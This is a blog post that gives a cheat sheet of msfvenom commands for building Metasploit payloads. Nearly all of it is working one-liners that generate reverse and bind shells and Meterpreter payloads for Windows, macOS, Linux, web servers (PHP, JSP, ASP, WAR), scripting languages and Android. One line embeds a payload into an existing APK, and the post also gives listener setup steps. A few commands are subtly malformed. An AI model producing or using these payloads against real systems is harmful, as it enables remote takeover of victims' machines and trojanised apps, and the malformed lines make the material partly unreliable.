GEEKPRATIK
28Avr/20

MsfVenom Payload Cheat Sheet | Meterpreter Payload Cheat Sheet

MSFvenom Payload Creator (MSFPC) is a user-friendly multiple payload generator that can be used to generate Metasploit payloads based on user-selected options.

Content Replace
ip-address => Attacker ip address
port => Attacker port

Metasploit Payload Listener

  • msfdb run
  • use exploit/multi/handler
  • set payload-name
  • set ip-address
  • set port
  • Run

Windows Payloads

Windows Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Reverse Shell

msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe

Windows Encoded Meterpreter Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe

Windows Meterpreter Reverse Shellcode

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform

macOS Payloads

macOS Bind Shell

msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho

macOS Reverse Shell

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho

macOS Reverse TCP Shellcode

msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform

Linux Payloads

Linux Meterpreter TCP Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind TCP Shell

 msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Bind Meterpreter TCP Shell

 msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf

Linux Meterpreter Reverse Shellcode

 msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform

Web-base Payloads

PHP Meterpreter Reverse Shell

 msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php

JSP Java Meterpreter Reverse Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp

ASP Meterpreter Reverse Shell

 msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp

WAR Reverse TCP Shell

 msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war

Script-Base Payloads

Perl Unix Reverse shell

 msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl

Bash Unix Reverse Shell

 msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh

Python Reverse Shell

 msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py

Android Payloads

Android Meterpreter reverse Payload

msfvenom –p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk

Android Embed Meterpreter Payload

msfvenom -x <app.apk> android/meterpreter/reverse_tcp lhost=ip-address lport=port -o payload-name.apk
Partager sur Facebook Partager sur Google+ Partager sur Digg Partager sur Reddit Partager sur Delicious Partager sur Delicious Partager sur Delicious
Remplis sous: Sécurité Laisser un commentaire
12/11/2021
Commentaires ()

Aucun commentaire pour l'instant


Poster un commentaire

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.

Trackbacks are disabled.

» «

Catégories

Articles récents